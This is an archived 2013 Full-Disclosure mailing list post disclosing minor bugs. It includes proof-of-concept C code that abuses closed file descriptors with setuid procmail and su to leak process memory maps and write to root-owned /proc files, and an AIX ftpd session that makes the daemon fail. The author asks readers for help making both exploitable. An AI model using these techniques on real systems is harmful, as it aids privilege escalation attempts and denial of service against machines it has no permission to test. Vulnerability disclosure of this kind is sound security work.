lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 11 Aug 2013 23:23:21 +0700
From: king cope <isowarez.isowarez.isowarez@...glemail.com>
To: full-disclosure@...ts.grok.org.uk, tinybugsmovingtoupstream@...nel.org
Subject: Super Tiny Linux and AIX bugs

Super Tiny Linux and AIX bugs

discovered and exploited by Kctherootkey somewhere between 9.8.2013-11.8.2013

allowed readers are h4x0rz listening to an arbritrary 2pac song,
all others please move along:>

uhh, hit em with a little tiny Linux bug.. my tiny Linux bug..

kcope@...netmars:~$ uname -a;cat /etc/debian_version
Linux monokelhost 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
7.1
kcope@...netmars:~$ cat test99.c
#include <fcntl.h>
main() {
        close(0);
        open("/proc/self/maps", O_RDONLY);
        execl("/usr/bin/procmail", "procmail", "-d", "kcope", 0);
}
kcope@...netmars:~$ gcc test99.c -o test99
kcope@...netmars:~$ >/var/mail/kcope
kcope@...netmars:~$ ./test99
kcope@...netmars:~$ cat /var/mail/kcope
08048000-0805c000 r-xp 00000000 08:01 144347     /usr/bin/procmail
0805c000-0805d000 r--p 00013000 08:01 144347     /usr/bin/procmail
0805d000-0805e000 rw-p 00014000 08:01 144347     /usr/bin/procmail
08c49000-08c6a000 rw-p 00000000 00:00 0          [heap]
b75a8000-b75b2000 r-xp 00000000 08:01 4908
/lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b2000-b75b3000 r--p 00009000 08:01 4908
/lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b3000-b75b4000 rw-p 0000a000 08:01 4908
/lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b4000-b75bd000 r-xp 00000000 08:01 4920
/lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bd000-b75be000 r--p 00008000 08:01 4920
/lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75be000-b75bf000 rw-p 00009000 08:01 4920
/lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bf000-b75d2000 r-xp 00000000 08:01 4918
/lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d2000-b75d3000 r--p 00012000 08:01 4918
/lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d3000-b75d4000 rw-p 00013000 08:01 4918
/lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d4000-b75d6000 rw-p 00000000 00:00 0
b75d6000-b75dc000 r-xp 00000000 08:01 4910
/lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dc000-b75dd000 r--p 00005000 08:01 4910
/lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dd000-b75de000 rw-p 00006000 08:01 4910
/lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75de000-b75e0000 rw-p 00000000 00:00 0
b75e0000-b773c000 r-xp 00000000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773c000-b773d000 ---p 0015c000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773d000-b773f000 r--p 0015c000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773f000-b7740000 rw-p 0015e000 08:01 4914
/lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7740000-b7743000 rw-p 00000000 00:00 0
b7743000-b7767000 r-xp 00000000 08:01 4911
/lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7767000-b7768000 r--p 00023000 08:01 4911
/lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7768000-b7769000 rw-p 00024000 08:01 4911
/lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b776e000-b7770000 rw-p 00000000 00:00 0
b7770000-b7771000 r-xp 00000000 00:00 0          [vdso]
b7771000-b778d000 r-xp 00000000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778d000-b778e000 r--p 0001b000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778e000-b778f000 rw-p 0001c000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
bfd62000-bfd83000 rw-p 00000000 00:00 0          [stack]

geez! leeks process maps of setuid root executable. should investigate deeper..

kcope@...netmars:~$ cat test99.c
#include <fcntl.h>
main() {
        close(2);
        open("/proc/self/comm", O_RDWR);
        execl("/bin/su", "su", 0);
}
kcope@...netmars:~$ ./test99

kcope@...netmars:~$ ps aux|grep su
root        12  0.0  0.0      0     0 ?        S    14:19   0:00 [sync_supers]
root      6543  0.0  0.4   4240  1128 pts/0    S+   17:58   0:00 su
kcope     6545  0.0  0.3   3568   820 pts/1    S+   17:58   0:00 grep su
You got mail in /var/mail/kcope !!

kcope@...netmars:~$ ls -la /proc/6543/comm
-rw-r--r-- 1 root root 0 Aug 11 17:58 /proc/6543/comm
kcope@...netmars:~$ cat /proc/6543/comm
Password:

its writing supplied input to root owned files!
can somebody, hello lists, give me pointers about how to exploit this, if
possible. i know this might an issue for vuln-dev but I m a rude boy!

another tiny bug in aix ftpd

kcope@...netmars:~$ nc <ip> 21
220 aix1 FTP server (Version 4.2 Wed Dec 23 11:06:15 CST 2009) ready.
user ftp
331 Guest login ok, send ident as password.
pass ftp
230-Last unsuccessful login: Sat Aug 10 19:23:18 EDT 2013 on ssh from planetmars
230-Last login: Sun Aug 11 11:03:41 EDT 2013 on ftp from planetmars
230 Guest login ok, access restrictions apply.
user root
421 ftpd: get_auth_methods() failed: Bad file number
421 root cannot authenticate to server

connection closes and ftpd might coredump..

can somebody please truss the process and tell me what file it want to open?
this might be exploitable. thanks alot!

/Kctherootkey

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ